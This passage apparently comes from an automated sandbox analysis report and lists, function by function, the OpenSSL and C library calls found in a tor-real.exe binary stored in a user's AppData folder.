                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C9430 EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,__stack_chk_fail,time,__stack_chk_fail,EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key,EVP_sha256,EVP_DigestSignInit,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,25_2_6C0C9430
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A148C CRYPTO_free,CRYPTO_memdup,25_2_6C0A148C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A5480 CRYPTO_zalloc,CRYPTO_THREAD_lock_new,EVP_PKEY_up_ref,X509_up_ref,EVP_PKEY_up_ref,X509_chain_up_ref,CRYPTO_malloc,memcpy,CRYPTO_malloc,memcpy,CRYPTO_malloc,memcpy,CRYPTO_memdup,X509_STORE_up_ref,X509_STORE_up_ref,CRYPTO_strdup,ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_free,25_2_6C0A5480
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0914A9 CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,ERR_put_error,25_2_6C0914A9
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C54D0 CRYPTO_memdup,CRYPTO_free,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,25_2_6C0C54D0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A3510 CRYPTO_malloc,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_malloc,memset,OPENSSL_cleanse,CRYPTO_clear_free,25_2_6C0A3510
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BD53B CRYPTO_free,CRYPTO_malloc,memcpy,ERR_put_error,25_2_6C0BD53B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C553B CRYPTO_free,25_2_6C0C553B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DF549 CRYPTO_clear_free,EVP_PKEY_CTX_free,ASN1_item_free,25_2_6C0DF549
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BD55B CRYPTO_free,CRYPTO_malloc,memcpy,25_2_6C0BD55B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D9558 BN_num_bits,BN_bn2bin,EVP_PKEY_size,EVP_DigestSignInit,EVP_DigestSign,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,25_2_6C0D9558
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E5560 CONF_parse_list,CRYPTO_malloc,memcpy,CRYPTO_free,CRYPTO_free,ERR_put_error,__stack_chk_fail,CRYPTO_malloc,memcpy,CRYPTO_free,CRYPTO_free,ERR_put_error,25_2_6C0E5560
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E9570 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,25_2_6C0E9570
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C9589 EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,25_2_6C0C9589
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BF583 CRYPTO_free,25_2_6C0BF583
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BF5C4 CRYPTO_free,25_2_6C0BF5C4
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C55D4 CRYPTO_free,CRYPTO_memdup,CRYPTO_memdup,25_2_6C0C55D4
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BF5E9 CRYPTO_free,25_2_6C0BF5E9
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DF5F1 CRYPTO_clear_free,25_2_6C0DF5F1
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A7600 COMP_zlib,CRYPTO_mem_ctrl,OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,OPENSSL_sk_sort,CRYPTO_mem_ctrl,25_2_6C0A7600
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DD611 CRYPTO_zalloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,__stack_chk_fail,25_2_6C0DD611
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C095630 CRYPTO_zalloc,ERR_put_error,memcpy,BUF_MEM_grow,BUF_MEM_grow,25_2_6C095630
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B5640 CRYPTO_set_ex_data,25_2_6C0B5640
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C5647 CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C0C5647
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AD653 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,25_2_6C0AD653
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BD650 CRYPTO_THREAD_write_lock,OPENSSL_LH_get_down_load,OPENSSL_LH_set_down_load,OPENSSL_LH_doall_arg,OPENSSL_LH_set_down_load,CRYPTO_THREAD_unlock,__stack_chk_fail,25_2_6C0BD650
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B5650 CRYPTO_get_ex_data,25_2_6C0B5650
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E5664 CRYPTO_free,25_2_6C0E5664
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B5660 CRYPTO_set_ex_data,25_2_6C0B5660
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B5670 CRYPTO_get_ex_data,25_2_6C0B5670
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BB68B CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,25_2_6C0BB68B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E9680 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,25_2_6C0E9680
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B1696 ERR_put_error,CRYPTO_free,25_2_6C0B1696
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C56A0 CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C0C56A0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A76A4 CRYPTO_free,25_2_6C0A76A4
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AD6B0 X509_VERIFY_PARAM_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,X509_free,CRYPTO_free_ex_data,BIO_pop,BIO_free,BIO_free_all,BIO_free_all,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,COMP_CTX_free,COMP_CTX_free,EVP_MD_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,CRYPTO_THREAD_lock_free,CRYPTO_free,25_2_6C0AD6B0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BB6D0 CRYPTO_set_ex_data,25_2_6C0BB6D0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C56EC CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C0C56EC
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BB6E0 CRYPTO_get_ex_data,25_2_6C0BB6E0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BB6F0 CRYPTO_zalloc,time,CRYPTO_THREAD_lock_new,CRYPTO_new_ex_data,ERR_put_error,CRYPTO_THREAD_lock_free,CRYPTO_free,ERR_put_error,CRYPTO_free,25_2_6C0BB6F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C96F1 EVP_PKEY_free,CRYPTO_free,25_2_6C0C96F1
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A1702 CRYPTO_free,25_2_6C0A1702
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BD700 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,25_2_6C0BD700
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CF720 CRYPTO_free,time,CRYPTO_free,CRYPTO_malloc,memcpy,EVP_sha256,EVP_Digest,EVP_MD_size,CRYPTO_free,__stack_chk_fail,25_2_6C0CF720
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A173A CRYPTO_free,strlen,CRYPTO_strdup,ERR_put_error,ERR_put_error,ERR_put_error,25_2_6C0A173A
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D1747 EVP_MD_CTX_free,CRYPTO_free,CRYPTO_strndup,25_2_6C0D1747
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B5744 strlen,CRYPTO_free,CRYPTO_strdup,CRYPTO_free,ERR_put_error,25_2_6C0B5744
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E5758 CRYPTO_free,25_2_6C0E5758
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A3789 CRYPTO_clear_free,25_2_6C0A3789
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A578C CRYPTO_memdup,X509_STORE_up_ref,X509_STORE_up_ref,CRYPTO_strdup,25_2_6C0A578C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C5795 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_realloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C0C5795
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C3790 CRYPTO_strdup,25_2_6C0C3790
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E9790 BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_put_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,ERR_put_error,25_2_6C0E9790
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D97C4 BN_num_bits,BN_bn2bin,EVP_PKEY_size,EVP_DigestSignInit,EVP_DigestSign,CRYPTO_free,BN_num_bits,BN_num_bits,memset,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,25_2_6C0D97C4
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B57D8 CRYPTO_free,25_2_6C0B57D8
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CF7EC CRYPTO_free,25_2_6C0CF7EC
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E57E0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_put_error,25_2_6C0E57E0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B7010 CRYPTO_free,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,25_2_6C0B7010
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A5033 i2d_X509_NAME,i2d_X509_NAME,CRYPTO_free,CRYPTO_free,memcmp,__stack_chk_fail,25_2_6C0A5033
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DB059 CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,25_2_6C0DB059
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C095050 CRYPTO_free,CRYPTO_free,25_2_6C095050
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D5089 CRYPTO_free,EVP_MD_CTX_free,25_2_6C0D5089
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B1080 CRYPTO_zalloc,CRYPTO_THREAD_lock_new,OPENSSL_sk_dup,X509_VERIFY_PARAM_new,X509_VERIFY_PARAM_inherit,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_malloc,memcpy,CRYPTO_new_ex_data,ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_free,ERR_put_error,25_2_6C0B1080
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A1090 CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C0A1090
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DB0A7 CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,25_2_6C0DB0A7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CD0A0 CRYPTO_malloc,memcpy,25_2_6C0CD0A0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A50E8 CRYPTO_free,CRYPTO_free,memcmp,25_2_6C0A50E8
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B70E1 CRYPTO_free,25_2_6C0B70E1
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D50E0 EVP_MD_CTX_new,X509_get0_pubkey,EVP_PKEY_size,BIO_free,EVP_MD_CTX_free,CRYPTO_free,EVP_PKEY_id,EVP_DigestVerifyInit,EVP_PKEY_id,EVP_DigestVerify,EVP_PKEY_id,EVP_PKEY_id,CRYPTO_malloc,BUF_reverse,EVP_DigestUpdate,EVP_MD_CTX_ctrl,EVP_DigestVerifyFinal,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,__stack_chk_fail,memcpy,memcpy,25_2_6C0D50E0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0950FC CRYPTO_free,CRYPTO_free,25_2_6C0950FC
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A5108 CRYPTO_free,CRYPTO_free,25_2_6C0A5108
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CD111 CRYPTO_malloc,memcpy,25_2_6C0CD111
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C112C OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,OPENSSL_sk_free,__stack_chk_fail,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,OPENSSL_sk_free,__stack_chk_fail,CRYPTO_malloc,memcpy,25_2_6C0C112C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A5120 CRYPTO_THREAD_run_once,25_2_6C0A5120
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CF140 CRYPTO_free,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,CRYPTO_free,__stack_chk_fail,25_2_6C0CF140
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C095150 CRYPTO_zalloc,ERR_put_error,BUF_MEM_grow,25_2_6C095150
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A5160 CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_put_error,ERR_put_error,CRYPTO_free,25_2_6C0A5160
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E5180 CRYPTO_free,25_2_6C0E5180
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BB1C9 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,ERR_put_error,25_2_6C0BB1C9
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CF1C4 CRYPTO_free,25_2_6C0CF1C4
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E11D0 EVP_CIPHER_key_length,EVP_CIPHER_iv_length,CRYPTO_malloc,__stack_chk_fail,OPENSSL_cleanse,__stack_chk_fail,OPENSSL_cleanse,__stack_chk_fail,CRYPTO_malloc,memcpy,memcpy,CRYPTO_malloc,memcpy,memcmp,memcmp,memcmp,ERR_put_error,CRYPTO_clear_free,ERR_put_error,25_2_6C0E11D0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BF1FC __stack_chk_fail,CRYPTO_free,25_2_6C0BF1FC
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D31F0 CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,25_2_6C0D31F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BD20B CRYPTO_free,CRYPTO_strdup,25_2_6C0BD20B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BB203 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,ERR_put_error,25_2_6C0BB203
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A524B X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,25_2_6C0A524B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BB241 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,ERR_put_error,25_2_6C0BB241
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D3256 CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,25_2_6C0D3256
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BB256 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,ERR_put_error,25_2_6C0BB256
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C095280 CRYPTO_zalloc,ERR_put_error,25_2_6C095280
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A9280 ERR_put_error,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,OPENSSL_sk_new_null,OPENSSL_sk_value,OPENSSL_sk_push,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_free,CRYPTO_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_set_cmp_func,OPENSSL_sk_sort,OPENSSL_sk_free,CRYPTO_free,ERR_put_error,CRYPTO_free,ERR_put_error,CRYPTO_free,__stack_chk_fail,BIO_snprintf,CRYPTO_malloc,ERR_put_error,25_2_6C0A9280
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C72E0 time,EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key,EVP_sha256,EVP_DigestSignInit,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,CRYPTO_memcmp,EVP_MD_CTX_free,EVP_PKEY_free,EVP_MD_CTX_free,EVP_PKEY_free,__stack_chk_fail,25_2_6C0C72E0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A52F0 EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,25_2_6C0A52F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A531B EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,25_2_6C0A531B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D5336 EVP_PKEY_size,BIO_free,EVP_MD_CTX_free,CRYPTO_free,EVP_PKEY_id,25_2_6C0D5336
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BD340 CRYPTO_free,CRYPTO_memdup,25_2_6C0BD340
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DB340 OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_num,OPENSSL_sk_value,memcmp,OPENSSL_sk_value,OPENSSL_sk_num,memcpy,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_value,OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_value,__stack_chk_fail,CRYPTO_memcmp,25_2_6C0DB340
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D9361 EVP_MD_CTX_new,strlen,EVP_PKEY_security_bits,BN_num_bits,BN_bn2bin,EVP_PKEY_size,EVP_DigestSignInit,EVP_DigestSign,CRYPTO_free,BN_num_bits,BN_num_bits,memset,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,EVP_PKEY_new,EVP_PKEY_assign,EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,DH_free,EVP_PKEY_get0_DH,EVP_PKEY_free,DH_get0_pqg,DH_get0_key,EVP_MD_CTX_free,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,__stack_chk_fail,CRYPTO_free,CRYPTO_malloc,RAND_bytes,__stack_chk_fail,25_2_6C0D9361
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DF387 CRYPTO_clear_free,EVP_PKEY_free,25_2_6C0DF387
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CF3A4 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C0CF3A4
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BB3F0 CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_clear_free,25_2_6C0BB3F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1A4FA0 CRYPTO_free,CRYPTO_free,free,CRYPTO_free,25_2_6C1A4FA0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1DC0A0 BUF_MEM_free,CRYPTO_secure_clear_free,CRYPTO_free,CRYPTO_clear_free,free,25_2_6C1DC0A0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1DC120 BUF_MEM_grow,CRYPTO_secure_malloc,memcpy,CRYPTO_secure_clear_free,CRYPTO_realloc,malloc,memset,memset,ERR_put_error,25_2_6C1DC120
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C29F1D0 CRYPTO_zalloc,CRYPTO_malloc,malloc,memset,25_2_6C29F1D0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1B32D0 BIO_free,CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,free,25_2_6C1B32D0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C29D3E0 OPENSSL_LH_insert,CRYPTO_realloc,memset,CRYPTO_malloc,malloc,__stack_chk_fail,OPENSSL_LH_delete,CRYPTO_free,CRYPTO_realloc,__stack_chk_fail,25_2_6C29D3E0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D6C14 CRYPTO_free,BN_is_negative,BN_is_zero,BIO_snprintf,BIO_snprintf,CRYPTO_free,BN_free,25_2_6C1D6C14
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D0C00 CRYPTO_free,CRYPTO_malloc,__stack_chk_fail,25_2_6C1D0C00
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C202C00 DH_meth_dup,CRYPTO_malloc,CRYPTO_strdup,CRYPTO_free,ERR_put_error,25_2_6C202C00
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1AAC39 CRYPTO_THREAD_get_local,CRYPTO_free,OPENSSL_sk_push,25_2_6C1AAC39
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1DEC30 CAST_cfb64_encrypt,CAST_encrypt,CAST_encrypt,__stack_chk_fail,CAST_ecb_encrypt,CAST_encrypt,CAST_decrypt,__stack_chk_fail,25_2_6C1DEC30
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C27AC10 EVP_Digest,CRYPTO_zalloc,EVP_MD_CTX_set_flags,EVP_DigestInit_ex,EVP_MD_CTX_reset,CRYPTO_free,EVP_MD_CTX_set_flags,OPENSSL_cleanse,OPENSSL_die,EVP_MD_CTX_ctrl,25_2_6C27AC10
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D6C47 CRYPTO_free,BN_div_word,BN_is_zero,BIO_snprintf,BIO_snprintf,CRYPTO_free,BN_free,25_2_6C1D6C47
